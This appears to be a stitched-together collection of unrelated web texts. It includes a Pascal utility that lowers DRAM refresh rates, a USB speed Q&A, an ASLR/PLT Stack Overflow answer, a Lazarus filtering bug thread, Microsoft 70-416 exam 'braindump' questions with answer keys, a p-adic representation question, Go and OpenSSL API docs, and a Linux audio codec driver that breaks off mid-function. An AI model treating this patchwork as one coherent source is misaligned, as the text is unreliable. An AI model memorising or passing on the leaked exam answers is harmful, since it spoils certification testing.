It is advised to obtain a total system benchmark utility and experiment with different refresh rates until you obtain the optimal performance, balanced by DRAM stability and hard drive needs. Most standard BIOS systems default the PIT timer 1 to a 66 kHz refresh rate. I was able to boost my 386's performance by 7% by lowering the memory refresh to 25 kHz, with negligible HD speed loss.
Program MEM_Rate (Input, Output);
{ MEM-Rate v1.11
Copyright (c) 1997 Matthew Vea
All Rights Reserved
Adjusts the memory refresh timer for improved system performance. }
{$G+} {80286 Instructions Enabled}
Const
Max = 1193180; { Maximum Rate }
Var
Rate : LongInt; { Memory Refresh Rate }
Code : Integer; { Scratch Variable }
Begin
Writeln;
Writeln ('Memory Refresh Control v1.10');
Writeln ('Copyright (c) 1997 Matthew Vea');
Writeln;
If ParamCount < 1 Then
Writeln ('ERROR : Refresh Rate Not Specified')
Else
Begin
Val (ParamStr (1), Rate, Code);
Port [$43] := $76;
Port [$41] := Lo (Max DIV Rate);
Port [$41] := Hi (Max DIV Rate);
Writeln ('New Refresh Rate = ', Rate / 1000 :1:2, 'Khz');
End;
Writeln;
End.
The code above takes a user defined refresh rate as a command line parameter.
The next step is to configure the PIT directly via the Command/Mode port 0x43 and the Channel 1 data port 0x41. A value of 0x76 (01110110) is written into the command port. 01 is written to bits 7 and 6 to designate Channel 1. 11 is written to bits 5 and 4 to designate both hi and lo bytes will be written to the data port. 011 for bits 3, 2, and 1 are just a default instructing the PIT to use the Square Wave generator. Finally, 0 is written to bit 0 configuring the chip to treat data as 16bit binary instead of BCD.
After writing to the Command/Mode port, the new frequency can be programmed into the Channel 1 data port. I/O ports only allow 8 data bits and therefore 16 bits must be written sequentially as the low byte followed by the high byte. To program a frequency, the maximum clock rate 1193180 gets divided by the desired frequency and each portion of that 16 bit result gets written to the 0x41 data port. The number 1193180 comes from the native clock frequency at 1.19MHz (1193180Hz). Immediately upon writing the high byte to the data port, the configuration will take effect.
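To make the divisor arithmetic concrete, here is a small Python sketch (not part of the original program) that computes the 16-bit divisor and the lo/hi bytes written to port 0x41 for a requested refresh rate:

```python
PIT_CLOCK = 1193180  # the PIT's native input clock, ~1.19 MHz

def divisor_bytes(rate_hz: int) -> tuple[int, int, int]:
    """Return (divisor, lo_byte, hi_byte) for a desired refresh rate in Hz."""
    divisor = PIT_CLOCK // rate_hz          # integer division, as in the Pascal code
    return divisor, divisor & 0xFF, (divisor >> 8) & 0xFF

# 25 kHz (the rate used in the article) needs divisor 47 -> lo=0x2F, hi=0x00
print(divisor_bytes(25_000))   # (47, 47, 0)
# 1 kHz needs divisor 1193 -> lo=0xA9, hi=0x04
print(divisor_bytes(1_000))    # (1193, 169, 4)
```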
What is the average speed of USB 2.0 drive (thumb)?
I tested one and this is the result,
avg read 15mb/s
avg write 5mb/s
Is that good speed?
7 Answers
• 9 years ago
Favourite answer
USB 2.0 has a maximum speed of 60 MB/s. USB 2.0 flash drives on the market are able to reach read and write speeds of up to 34 and 28MB/s respectively. That being the maximum, I would say your speed is probably a little low, but not terribly. Actual speeds are also largely dependent on the USB controller of your motherboard and how many USB devices are simultaneously plugged in.
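For reference, the 60 MB/s figure comes straight from the bus's signalling rate: USB 2.0 Hi-Speed runs at 480 Mbit/s, and dividing by 8 bits per byte gives the theoretical ceiling (real-world throughput is lower because of protocol overhead):

```python
signalling_rate_bits = 480_000_000          # USB 2.0 Hi-Speed, bits per second
theoretical_mb_s = signalling_rate_bits / 8 / 1_000_000
print(theoretical_mb_s)                     # 60.0 MB/s theoretical maximum
```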
• Anonymous
9 years ago
That's the average for the USB 2.0, if you want to increase speed get a 3.0 port, and btw Teracopy can increase your read/write speed by at least 150%
Source(s): IT Technician, personally uses Teracopy for large amounts of data.
• Anonymous
9 years ago
The maximum theoretical speed of usb 2.0 is 60mb/s, actual speed though differs due to hardware limitations etc. but you should still be able to achieve a max 40mb/s. 5 mb/s seems rather slow in comparison.
• 9 years ago
I would say its fine. It doesn't really matter unless you are constantly pulling data off of of your drive and putting things on it everyday especially big files such as video files if you are a film editor. If you are going to be doing big constant work you should purchase an external hard drive all together.
• Anonymous
9 years ago
Yup it seems like ok.
• 9 years ago
0mph
Still have questions? Get answers by asking now.
|
__label__pos
| 0.737552 |
webbhorn - 3 months ago
Linux Question
Why aren't glibc's function addresses randomized when ASLR is enabled?
In trying to understand ASLR, I built this simple program:
#include <stdio.h>
#include <stdlib.h>
int main() {
printf("%p\n", &system);
return 0;
}
ASLR seems to be enabled:
$ cat /proc/sys/kernel/randomize_va_space
2
and I used GCC to compile the program:
$ gcc aslrtest.c
Every time I run this program, it prints the same address (0x400450).

I would expect this program to print a different address each time if glibc is loaded at a random address. This is surprising to me, especially given that preventing return-to-libc attacks is supposed to be a primary motivation for ASLR (in particular the system() call).

Am I wrong in expecting that the address of system() should be randomized? Or is there likely something wrong with my configuration?
R..
Answer
Any references to a function from a shared library that's made from a non-position-independent object file in the main program requires a PLT entry through which the caller can make the call via a call instruction that's resolved to a fixed address at link-time. This is because the object file was not built with special code (PIC) to enable it to support calling a function at a variable address.
Whenever such a PLT entry is used for a function in a library, the address of this PLT entry, not the original address of the function, becomes its "official" address (as in your example where you printed the address of system). This is necessary because the address of a function must be seen the same way from all parts of a C program; it's not permitted by the language for the address of system to vary based on which part of the program is looking at it, as this would break the rule that two pointers to the same function compare as equal.
If you really want to get the benefits of ASLR against attacks that call a function using a known fixed address, you need to build the main program as PIE.
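One way to observe the distinction the answer describes, without recompiling anything, is to ask the dynamic linker for libc's real address of system() at run time. This Python sketch assumes a POSIX system; with ASLR active, the printed address changes from run to run, unlike the fixed PLT-entry address printed by the non-PIE C program above:

```python
import ctypes

# Handle to the running process's loaded libraries (POSIX only).
libc = ctypes.CDLL(None)
# The actual mapped location of system() inside libc, not a PLT stub.
addr = ctypes.cast(libc.system, ctypes.c_void_p).value
print(hex(addr))
```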
Forum > Databases
BufDataset foCaseInsensitive not working with "ñ" "Ñ"
lainz:
"Tempo" is the TEdit text.
The filter works fine for any text, except these special characters.
--- Code: Pascal ---
Productos.Filtered := False;
Productos.FilterOptions := [foCaseInsensitive];
//Productos.Filter := '(sNombre = ' + QuotedStr('*' + Tempo + '*')
//  + ' OR sCodProducto = ' + QuotedStr(Tempo)
//  + ' OR sEan = ' + QuotedStr(Tempo)
//  + ' OR sEan2 = ' + QuotedStr(Tempo) + ') '
//  + ' AND bActivo <> ' + QuotedStr('F');
Productos.Filter := ArmarFiltroProductos(Tempo); // the same as the commented lines above
Productos.Filter := Productos.Filter + ' AND sTipoProducto <> ' + QuotedStr('I');
Productos.Filtered := True;
The lowercase of Ñ is ñ, but setting foCaseInsensitive has no effect.
If I type Ñ only uppercase elements of the DB are returned in the DBGrid. Like "Ñandú" but not "Cañón".
If I type ñ only lowercase elements of the DB are returned in the DBGrid. Like "Cañón" but not "Ñandú".
The DB has mixed content, some are upper case and some are lower case.
In BufDataset.pas I found this
--- Code: Pascal ---
function DBCompareText(subValue, aValue: pointer; size: integer; options: TLocateOptions): LargeInt;
begin
  if [loCaseInsensitive, loPartialKey] = options then
    Result := AnsiStrLIComp(pchar(subValue), pchar(aValue), length(pchar(subValue)))
  else if [loPartialKey] = options then
    Result := AnsiStrLComp(pchar(subValue), pchar(aValue), length(pchar(subValue)))
  else if [loCaseInsensitive] = options then
    Result := AnsiCompareText(pchar(subValue), pchar(aValue))
  else
    Result := AnsiCompareStr(pchar(subValue), pchar(aValue));
end;
Anyway, ñ and Ñ are both in the ANSI table:
http://ascii-table.com/ansi-codes.php
209 D1 U+00D1 Ñ Latin Capital Letter N With Tilde
241 F1 U+00F1 ñ Latin Small Letter N With Tilde
Any ideas on how to fix? I'm on Windows but the project works also on Linux and macOS.
lainz:
Attached is a simple test project that replicates the issue; I'm reporting it on the bug tracker too.
How to test:
- Click on the first button, and see the filtered records (it displays only 1 record, must display 2)
- Click on the second button, and see the filtered records (it displays only 1 record, must display 2)
Edit: Reported here
https://bugs.freepascal.org/view.php?id=36512
amartitegui:
Hello
No news on this right?
LacaK:
IMO the problem is in the AnsiCompareText function. On Windows this function calls the Win API function CompareStringA(), which "Compares two character strings, for a locale specified by identifier" - so CompareStringA(LOCALE_USER_DEFAULT, NORM_IGNORECASE, ...) is called.
And there is remark "If your application is calling the ANSI version of CompareString, the function converts parameters via the default code page of the supplied locale. Thus, an application can never use CompareString to handle UTF-8 text."
But in Lazarus, strings are UTF-8 encoded by default, so you probably supply UTF-8 strings to AnsiCompareText, which will not work ...
In my experiments on Windows (ansi code page 1250):
- CompareStringA(LOCALE_USER_DEFAULT, NORM_IGNORECASE, 'ábc',3,'ÁBC',3)-2 == 0 ... OK
- CompareStringA(LOCALE_USER_DEFAULT, NORM_IGNORECASE, 'ábc',3,'ABC',3)-2 <> 0 ... OK
- CompareStringA(LOCALE_USER_DEFAULT, NORM_IGNORECASE+LINGUISTIC_IGNOREDIACRITIC, 'ábc',3,'ABC',3)-2 == 0 ... OK
Thaddy:
As per MSDN, CompareStringEx should be called for UTF-8/UTF-16 text. It looks like this has no impact except on Windows versions before Vista.
See the advice here:
https://learn.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-comparestringa
So this indeed is a bug and needs to be corrected.
Also note that even CompareStringEx has some security considerations, as described here:
https://learn.microsoft.com/en-us/windows/win32/intl/security-considerations--international-features
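LacaK's point — that a byte-level ANSI comparison cannot fold UTF-8 "Ñ" to "ñ" — can be sketched outside Pascal (a Python illustration, not Lazarus code):

```python
# Why an ASCII/byte-level case fold misses "ñ"/"Ñ": naive lowercasing
# only touches A-Z, while a Unicode-aware casefold maps U+00D1 -> U+00F1.
def ascii_lower(s):
    return "".join(chr(ord(c) + 32) if "A" <= c <= "Z" else c for c in s)

print(ascii_lower("Ñandú"))   # "Ñandú"  -- Ñ is left untouched
print("Ñandú".casefold())     # "ñandú"  -- full Unicode folding

# A case-insensitive "contains" filter in the spirit of foCaseInsensitive:
records = ["Ñandú", "Cañón"]
needle = "ñ"
matches = [r for r in records if needle.casefold() in r.casefold()]
print(matches)                # both records match, as the filter should
```

With Unicode-aware folding, typing either "ñ" or "Ñ" returns both "Ñandú" and "Cañón", which is the behaviour the thread expects from foCaseInsensitive.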
2014 Latest Microsoft 70-416 Exam Dumps Free Download (71-80)!
QUESTION 71
Your network contains a Virtual Desktop Infrastructure (VDI). All users access applications by using their virtual desktop. All virtual desktops run Windows 8. You have a test environment that contains four computers. The computers are configured as shown in the following table.
[exhibit table omitted]
You plan to sequence 15 applications that will be deployed to the virtual desktops. You need to identify which computers must be used to run the App-V Sequencer. Which computer should you identify? More than one answer choice may achieve the goal. Select the BEST answer.
A. Server1
B. Client1
C. Server2
D. Client2
Answer: D
QUESTION 72
Your network contains an Active Directory domain named contoso.com. The domain contains five servers. The servers are configured as shown in the following table.
[exhibit table omitted]
You plan to deploy three App-V applications named App1, App2, and App3 by using RemoteApp publishing. Users will access App1, App2, and App3 from the RD Web Access site. You need to ensure that the users can run App1, App2, and App3 by clicking links to the applications from the RD Web Access site. On which server should you install the App-V client?
A. Server1
B. Server2
C. Server3
D. Server4
E. Server5
Answer: A
QUESTION 73
Your network contains an Active Directory domain named contoso.com. You deploy Remote Desktop Services (RDS) and publish multiple RemoteApp programs. You need to ensure that users can subscribe to the RemoteApp and Desktop Connections feed by using their email address. Which resource record type should you add to the DNS zone? To answer, select the appropriate resource record type in the answer area.
[exhibit omitted]
Answer:
[answer exhibit omitted]
QUESTION 74
Your network contains an Active Directory domain named contoso.com. Your company plans to deploy a Remote Desktop Services (RDS) infrastructure that will contain six Remote Desktop Session Host (RD Session Host) servers and three applications. The servers will be configured as shown in the following table.
[exhibit table omitted]
You need to identify how many session collections will be required to publish the applications on the RD Session Host servers. How many session collections should you identify?
A. 1
B. 2
C. 3
D. 4
Answer: D
QUESTION 75
Your network contains an Active Directory domain named contoso.com. You deploy Remote Desktop Services (RDS) to four servers. The servers are configured as shown in the following table.
[exhibit table omitted]
You create a session collection named Collection1 that contains Server1 and Server2. Collection1 will use user profile disks stored in a share named Share1. Two users named User1 and User2 are members of a group named Group2. User1 and User2 will use RDS. You need to identify which security principal must have full permissions to Share1. Which security principal should you identify? To answer, select the appropriate object in the answer area.
[exhibit omitted]
Answer:
[answer exhibit omitted]
QUESTION 76
Your network contains an Active Directory domain named contoso.com. The domain has Remote Desktop Services (RDS) deployed. A technician publishes 10 line-of-business applications and 10 productivity applications as RemoteApp programs. You need to ensure that the RemoteApp programs are organized in two separate categories on the Remote Desktop Web Access (RD Web Access) site. What should you modify?
A. The Web.config file of the RD Web Access site
B. The Directory Browsing settings of the RD Web Access site
C. The list of RemoteApp program folders in the properties of the RemoteApp programs
D. The User Assignment settings of the RemoteApp programs
Answer: C
QUESTION 77
Your company has a main office and 10 branch offices. Each branch office connects to the main office by using a low-bandwidth WAN link. All servers run Windows Server 2012. All client computers run Windows 8. You plan to deploy 20 new line-of-business applications to all of the client computers. You purchase 5,000 client licenses for the line-of-business applications. You need to recommend an application distribution solution. The solution must be able to meet the following requirements:
– Download application installation files from a server in the local site.
– Generate reports that contain information about the installed applications.
– Generate administrative alerts when the number of installed applications exceeds the number of purchased licenses.
What should you include in the recommendation?
More than one answer choice may achieve the goal. Select the BEST answer.
A. Applications published as RemoteApp programs
B. Assigned applications by using Group Policy objects (GPOs)
C. Applications deployed by using Microsoft System Center 2012 Configuration Manager
D. Published applications by using Microsoft Application Virtualization (App-V) publishing servers
Answer: C
QUESTION 78
Your company has a main office and two branch offices. The branch offices connect to the main office by using a slow WAN link. You plan to deploy applications to all of the offices by using Microsoft Application Visualization (App-V) 5.0 streaming. You need to recommend the server placement for the planned infrastructure. What should you recommend? More than one answer choice may achieve the goal. Select the BEST answer.
A. In the main office, deploy a management server, a database server, and a publishing server.
In the branch offices, deploy a publishing server.
B. In the main office, deploy a database server and a publishing server.
In the branch offices, deploy a management server, a database server, and a publishing server.
C. In the main office, deploy a management server, a database server, and a publishing server.
In the branch offices, deploy a database server.
D. In each office, deploy a management server, a database server, and a publishing server.
Answer: A
QUESTION 79
Your network contains an Active Directory domain named contoso.com. The domain contains 500 client computers that run Windows 8. You plan to deploy two applications named App1 and App2 to the client computers. App2 is updated by the application manufacturer every month. You need to recommend an application distribution strategy for the applications. The solution must meet the following requirements:
– The executable files of App1 must NOT be stored on the client computers.
– Users who run App2 must run the latest version of App2 only.
What should you recommend using to deploy the applications?
A. Microsoft Application Virtualization (App-V) in streaming mode
B. A Group Policy software distribution package that is published to the user accounts
C. Windows XP Mode
D. A Group Policy software distribution package that is assigned to the user accounts
Answer: A
QUESTION 80
Your network contains an Active Directory domain named contoso.com. All client computers run Windows 7. You plan to upgrade all of the client computers to Windows 8. You install the Microsoft Application Compatibility Toolkit (ACT) on a server named Server1. You configure Server1 to host the Log Processing Service shared folder. You need to recommend which permissions must be assigned to the Log Processing Service shared folder. The solution must provide the least amount of permissions to the shared folder. Which permissions should you recommend assigning to the Everyone group on the shared folder? (Each correct answer presents part of the solution. Choose all that apply.)
A. Write NTFS permissions
B. Read NTFS permissions
C. Change Share permissions
D. Read NTFS permissions and Execute NTFS permissions
E. Read Share permissions
Answer: ACE
Passing Microsoft 70-416 Exam successfully in a short time! Just using Braindump2go’s Latest Microsoft 70-416 Dump: http://www.braindump2go.com/70-416.html
There are many papers studying branching laws of irreducible admissible complex representations of classical groups over local fields, are there some analogues for $p$-adic representations?
For example, consider an irreducible admissible $p$-adic representation of $GL_2(\mathbb Q_p)$, what are the multiplicities of its restriction to $GL_1(\mathbb Q_p)$ ? How about $GL_n(\mathbb Q_{p^2})$ to $GL_n(\mathbb Q_p)$ ?
More precisely, $p$-adic representations of $G$ mean admissible unitary $L$-Banach representations of $G(\mathbb Q_p)$ where $G$ is a reductive group over $\mathbb Q_p$, and $L$ is a finite extension of $\mathbb Q_p$. They are natural objects in the $p$-adic Langlands program. And we care about dimension of $Hom_H(\pi|_{H}, \sigma)$ as in the classical branching law where $H$ is a reductive subgroup of $G$, and the representations $\pi$ and $\sigma$ are both irreducible.
Can you clarify whether you are asking about representations defined over $p$-adic fields or over $\mathbb C$? Paul Broussous' answer assumes the latter, though this falls under the heading of "irreducible admissible complex representations of classical groups over local fields" which you said you knew about. – Kimball Oct 25 at 9:23
You're right, I did not understand the question correctly ... – Paul Broussous Oct 25 at 11:31
Well, I'm not sure---I find the question a bit vague, as the term "$p$-adic representation" is. Also, previous questions of the OP make me wonder which is actually meant. – Kimball Oct 25 at 14:29
Sorry, I shall be more specific, thank you! – sawdada Oct 25 at 17:19
If you're asking about admissible p-adic Banach space representations in the sense of Schneider--Teitelbaum, then I think virtually nothing is known in this setting about branching laws, even in the simplest cases like branching from $GL_2(\mathbb{Q}_p)$ to the diagonal maximal torus (a case which we understand extremely well for smooth representations, thanks to Waldspurger's theorem).
Are there any $p$-adic multiplicity-one results known, like a (non-reductive) analogue of Whittaker models? – Kimball Oct 25 at 18:19
Colmez's work on p-adic Langlands uses something he calls a Kirillov model; but I don't know if it has the same uniqueness properties as the Whittaker/Kirillov models in the smooth theory. – David Loeffler Oct 26 at 9:13
Conditions after actions
Hi, does anyone know if it’s possible to add a condition after taking an action? For example, when I set a custom action on a button I am able to add a condition at the beginning, but I am not able to add another condition after an action is taken. Is there a way to do that? I need to "make a decision" after the action is taken, not before.
Not yet. We’ve requested it.
Just curious, what is your specific use case for this?
I need to set a value in a column and, based on that value, I need to show a success or failure notification.
image
import "android.googlesource.com/platform/tools/gpu/image"
Package image provides functions for converting between various image formats.
Usage
func Convert
func Convert(data []byte, width int, height int, srcFmt Format, dstFmt Format) ([]byte, error)
Convert uses the registered Converters to convert the image formed from the parameters data, width and height from srcFmt to dstFmt. If the conversion succeeds then the converted image data is returned, otherwise an error is returned. If no direct converter has been registered to convert from srcFmt to dstFmt, then Convert may try converting via an intermediate format.
func RegisterConverter
func RegisterConverter(src, dst Format, c Converter)
RegisterConverter registers the Converter for converting from src to dst formats. If a converter already exists for converting from src to dst, then this function panics.
type Converter
type Converter func(data []byte, width int, height int) ([]byte, error)
Converter is used to convert the image formed from the parameters data, width and height into another format. If the conversion succeeds then the converted image data is returned, otherwise an error is returned.
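The registration/lookup pattern these docs describe — converters keyed by a (src, dst) pair, with Convert falling back to an intermediate format when no direct converter exists — can be sketched as follows (Python here purely as an illustration of the pattern, not the real Go package):

```python
# Illustrative sketch of a converter registry with one-hop fallback.
_converters = {}

def register_converter(src, dst, fn):
    if (src, dst) in _converters:
        raise ValueError(f"converter {src}->{dst} already registered")
    _converters[(src, dst)] = fn

def convert(data, src, dst):
    if src == dst:
        return data
    direct = _converters.get((src, dst))
    if direct:
        return direct(data)
    # No direct converter: try routing through one intermediate format.
    for (s, mid), first in _converters.items():
        if s == src and (mid, dst) in _converters:
            return _converters[(mid, dst)](first(data))
    raise LookupError(f"no conversion path {src}->{dst}")

# Hypothetical formats; the tags just trace which converters ran.
register_converter("ETC1", "RGBA", lambda d: d + ":rgba")
register_converter("RGBA", "PNG", lambda d: d + ":png")
print(convert("texels", "ETC1", "PNG"))   # routed via RGBA
```

As in the Go package, registering the same (src, dst) pair twice is an error, and a request like ETC1→PNG succeeds indirectly via an uncompressed intermediate.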
type Format
type Format interface {
Check(data []byte, width, height int) error
}
Format is the interface for an image and/or pixel format.
Check returns an error if the combination of data, image width and image height is invalid for the given format, otherwise Check returns nil.
func ATC_RGBA_EXPLICIT_ALPHA_AMD
func ATC_RGBA_EXPLICIT_ALPHA_AMD() Format
ATC_RGBA_EXPLICIT_ALPHA_AMD returns a format representing the texture compression format with the same name.
func ATC_RGB_AMD
func ATC_RGB_AMD() Format
ATC_RGB_AMD returns a format representing the texture compression format with the same name.
func Alpha
func Alpha() Format
Alpha returns a format containing a single 8-bit alpha channel per pixel.
func ETC1_RGB8_OES
func ETC1_RGB8_OES() Format
ETC1_RGB8_OES returns a format representing the texture compression format with the same name.
func Luminance
func Luminance() Format
Luminance returns a format containing a single 8-bit luminance channel per pixel.
func LuminanceAlpha
func LuminanceAlpha() Format
LuminanceAlpha returns a format containing an 8-bit luminance and alpha channel per pixel.
func PNG
func PNG() Format
PNG returns a format representing the image format with the same name.
func RGB
func RGB() Format
RGB returns a format containing an 8-bit red, green and blue channel per pixel.
func RGBA
func RGBA() Format
RGBA returns a format containing an 8-bit red, green, blue and alpha channel per pixel.
RedHat 9 (Linux i386) - man page for pkcs12_create (redhat section 3)
PKCS12_create(3) OpenSSL PKCS12_create(3)
NAME
PKCS12_create - create a PKCS#12 structure
SYNOPSIS
#include <openssl/pkcs12.h>

PKCS12 *PKCS12_create(char *pass, char *name, EVP_PKEY *pkey, X509 *cert,
                      STACK_OF(X509) *ca, int nid_key, int nid_cert,
                      int iter, int mac_iter, int keytype);
DESCRIPTION
PKCS12_create() creates a PKCS#12 structure. pass is the passphrase to use. name is the friendlyName to use for the supplied certificate and key. pkey is the private key to include in the structure and cert its corresponding certificate. ca, if not NULL, is an optional set of certificates to also include in the structure. nid_key and nid_cert are the encryption algorithms that should be used for the key and certificate respectively. iter is the encryption algorithm iteration count to use and mac_iter is the MAC iteration count to use. keytype is the type of key.
NOTES
The parameters nid_key, nid_cert, iter, mac_iter and keytype can all be set to zero and sensible defaults will be used. These defaults are: 40-bit RC2 encryption for certificates, triple DES encryption for private keys, a key iteration count of PKCS12_DEFAULT_ITER (currently 2048) and a MAC iteration count of 1. The default MAC iteration count is 1 in order to retain compatibility with old software which did not interpret MAC iteration counts. If such compatibility is not required then mac_iter should be set to PKCS12_DEFAULT_ITER. keytype adds a flag to the stored private key. This is a non-standard extension that is currently only interpreted by MSIE. If set to zero the flag is omitted; if set to KEY_SIG the key can be used for signing only; if set to KEY_EX it can be used for signing and encryption. This option was useful for old export-grade software which could use signing-only keys of arbitrary size but had restrictions on the permissible sizes of keys which could be used for encryption.
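To make the "zero means a sensible default" convention concrete, here is a small illustrative sketch of the defaulting logic only (the constant names mirror the man page's wording; they are not real OpenSSL identifiers):

```python
# Sketch of the NOTES section's defaulting rules for PKCS12_create().
PKCS12_DEFAULT_ITER = 2048
NID_RC2_40_CBC = "rc2-40-cbc"      # stated default certificate encryption
NID_3DES_CBC   = "des-ede3-cbc"    # stated default private-key encryption

def effective_params(nid_key=0, nid_cert=0, iter_=0, mac_iter=0):
    """Return the values PKCS12_create() would effectively use."""
    return {
        "nid_key":  nid_key  or NID_3DES_CBC,
        "nid_cert": nid_cert or NID_RC2_40_CBC,
        "iter":     iter_    or PKCS12_DEFAULT_ITER,
        "mac_iter": mac_iter or 1,  # 1 for old-software compatibility
    }

print(effective_params())
```

Passing any non-zero value overrides just that one parameter, which is why a caller wanting stronger MAC protection only needs to set mac_iter to PKCS12_DEFAULT_ITER.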
SEE ALSO
d2i_PKCS12(3)
HISTORY
PKCS12_create was added in OpenSSL 0.9.3.
Linux/sound/soc/codecs/wm8776.c
1 /*
2 * wm8776.c -- WM8776 ALSA SoC Audio driver
3 *
4 * Copyright 2009-12 Wolfson Microelectronics plc
5 *
6 * Author: Mark Brown <[email protected]>
7 *
8 * This program is free software; you can redistribute it and/or modify
9 * it under the terms of the GNU General Public License version 2 as
10 * published by the Free Software Foundation.
11 *
12 * TODO: Input ALC/limiter support
13 */
14
15 #include <linux/module.h>
16 #include <linux/moduleparam.h>
17 #include <linux/init.h>
18 #include <linux/delay.h>
19 #include <linux/pm.h>
20 #include <linux/i2c.h>
21 #include <linux/of_device.h>
22 #include <linux/regmap.h>
23 #include <linux/spi/spi.h>
24 #include <linux/slab.h>
25 #include <sound/core.h>
26 #include <sound/pcm.h>
27 #include <sound/pcm_params.h>
28 #include <sound/soc.h>
29 #include <sound/initval.h>
30 #include <sound/tlv.h>
31
32 #include "wm8776.h"
33
34 enum wm8776_chip_type {
35 WM8775 = 1,
36 WM8776,
37 };
38
39 /* codec private data */
40 struct wm8776_priv {
41 struct regmap *regmap;
42 int sysclk[2];
43 };
44
45 static const struct reg_default wm8776_reg_defaults[] = {
46 { 0, 0x79 },
47 { 1, 0x79 },
48 { 2, 0x79 },
49 { 3, 0xff },
50 { 4, 0xff },
51 { 5, 0xff },
52 { 6, 0x00 },
53 { 7, 0x90 },
54 { 8, 0x00 },
55 { 9, 0x00 },
56 { 10, 0x22 },
57 { 11, 0x22 },
58 { 12, 0x22 },
59 { 13, 0x08 },
60 { 14, 0xcf },
61 { 15, 0xcf },
62 { 16, 0x7b },
63 { 17, 0x00 },
64 { 18, 0x32 },
65 { 19, 0x00 },
66 { 20, 0xa6 },
67 { 21, 0x01 },
68 { 22, 0x01 },
69 };
70
71 static bool wm8776_volatile(struct device *dev, unsigned int reg)
72 {
73 switch (reg) {
74 case WM8776_RESET:
75 return true;
76 default:
77 return false;
78 }
79 }
80
81 static int wm8776_reset(struct snd_soc_codec *codec)
82 {
83 return snd_soc_write(codec, WM8776_RESET, 0);
84 }
85
86 static const DECLARE_TLV_DB_SCALE(hp_tlv, -12100, 100, 1);
87 static const DECLARE_TLV_DB_SCALE(dac_tlv, -12750, 50, 1);
88 static const DECLARE_TLV_DB_SCALE(adc_tlv, -10350, 50, 1);
89
90 static const struct snd_kcontrol_new wm8776_snd_controls[] = {
91 SOC_DOUBLE_R_TLV("Headphone Playback Volume", WM8776_HPLVOL, WM8776_HPRVOL,
92 0, 127, 0, hp_tlv),
93 SOC_DOUBLE_R_TLV("Digital Playback Volume", WM8776_DACLVOL, WM8776_DACRVOL,
94 0, 255, 0, dac_tlv),
95 SOC_SINGLE("Digital Playback ZC Switch", WM8776_DACCTRL1, 0, 1, 0),
96
97 SOC_SINGLE("Deemphasis Switch", WM8776_DACCTRL2, 0, 1, 0),
98
99 SOC_DOUBLE_R_TLV("Capture Volume", WM8776_ADCLVOL, WM8776_ADCRVOL,
100 0, 255, 0, adc_tlv),
101 SOC_DOUBLE("Capture Switch", WM8776_ADCMUX, 7, 6, 1, 1),
102 SOC_DOUBLE_R("Capture ZC Switch", WM8776_ADCLVOL, WM8776_ADCRVOL, 8, 1, 0),
103 SOC_SINGLE("Capture HPF Switch", WM8776_ADCIFCTRL, 8, 1, 1),
104 };
105
106 static const struct snd_kcontrol_new inmix_controls[] = {
107 SOC_DAPM_SINGLE("AIN1 Switch", WM8776_ADCMUX, 0, 1, 0),
108 SOC_DAPM_SINGLE("AIN2 Switch", WM8776_ADCMUX, 1, 1, 0),
109 SOC_DAPM_SINGLE("AIN3 Switch", WM8776_ADCMUX, 2, 1, 0),
110 SOC_DAPM_SINGLE("AIN4 Switch", WM8776_ADCMUX, 3, 1, 0),
111 SOC_DAPM_SINGLE("AIN5 Switch", WM8776_ADCMUX, 4, 1, 0),
112 };
113
114 static const struct snd_kcontrol_new outmix_controls[] = {
115 SOC_DAPM_SINGLE("DAC Switch", WM8776_OUTMUX, 0, 1, 0),
116 SOC_DAPM_SINGLE("AUX Switch", WM8776_OUTMUX, 1, 1, 0),
117 SOC_DAPM_SINGLE("Bypass Switch", WM8776_OUTMUX, 2, 1, 0),
118 };
119
120 static const struct snd_soc_dapm_widget wm8776_dapm_widgets[] = {
121 SND_SOC_DAPM_INPUT("AUX"),
122
123 SND_SOC_DAPM_INPUT("AIN1"),
124 SND_SOC_DAPM_INPUT("AIN2"),
125 SND_SOC_DAPM_INPUT("AIN3"),
126 SND_SOC_DAPM_INPUT("AIN4"),
127 SND_SOC_DAPM_INPUT("AIN5"),
128
129 SND_SOC_DAPM_MIXER("Input Mixer", WM8776_PWRDOWN, 6, 1,
130 inmix_controls, ARRAY_SIZE(inmix_controls)),
131
132 SND_SOC_DAPM_ADC("ADC", "Capture", WM8776_PWRDOWN, 1, 1),
133 SND_SOC_DAPM_DAC("DAC", "Playback", WM8776_PWRDOWN, 2, 1),
134
135 SND_SOC_DAPM_MIXER("Output Mixer", SND_SOC_NOPM, 0, 0,
136 outmix_controls, ARRAY_SIZE(outmix_controls)),
137
138 SND_SOC_DAPM_PGA("Headphone PGA", WM8776_PWRDOWN, 3, 1, NULL, 0),
139
140 SND_SOC_DAPM_OUTPUT("VOUT"),
141
142 SND_SOC_DAPM_OUTPUT("HPOUTL"),
143 SND_SOC_DAPM_OUTPUT("HPOUTR"),
144 };
145
146 static const struct snd_soc_dapm_route routes[] = {
147 { "Input Mixer", "AIN1 Switch", "AIN1" },
148 { "Input Mixer", "AIN2 Switch", "AIN2" },
149 { "Input Mixer", "AIN3 Switch", "AIN3" },
150 { "Input Mixer", "AIN4 Switch", "AIN4" },
151 { "Input Mixer", "AIN5 Switch", "AIN5" },
152
153 { "ADC", NULL, "Input Mixer" },
154
155 { "Output Mixer", "DAC Switch", "DAC" },
156 { "Output Mixer", "AUX Switch", "AUX" },
157 { "Output Mixer", "Bypass Switch", "Input Mixer" },
158
159 { "VOUT", NULL, "Output Mixer" },
160
161 { "Headphone PGA", NULL, "Output Mixer" },
162
163 { "HPOUTL", NULL, "Headphone PGA" },
164 { "HPOUTR", NULL, "Headphone PGA" },
165 };
166
167 static int wm8776_set_fmt(struct snd_soc_dai *dai, unsigned int fmt)
168 {
169 struct snd_soc_codec *codec = dai->codec;
170 int reg, iface, master;
171
172 switch (dai->driver->id) {
173 case WM8776_DAI_DAC:
174 reg = WM8776_DACIFCTRL;
175 master = 0x80;
176 break;
177 case WM8776_DAI_ADC:
178 reg = WM8776_ADCIFCTRL;
179 master = 0x100;
180 break;
181 default:
182 return -EINVAL;
183 }
184
185 iface = 0;
186
187 switch (fmt & SND_SOC_DAIFMT_MASTER_MASK) {
188 case SND_SOC_DAIFMT_CBM_CFM:
189 break;
190 case SND_SOC_DAIFMT_CBS_CFS:
191 master = 0;
192 break;
193 default:
194 return -EINVAL;
195 }
196
197 switch (fmt & SND_SOC_DAIFMT_FORMAT_MASK) {
198 case SND_SOC_DAIFMT_I2S:
199 iface |= 0x0002;
200 break;
201 case SND_SOC_DAIFMT_RIGHT_J:
202 break;
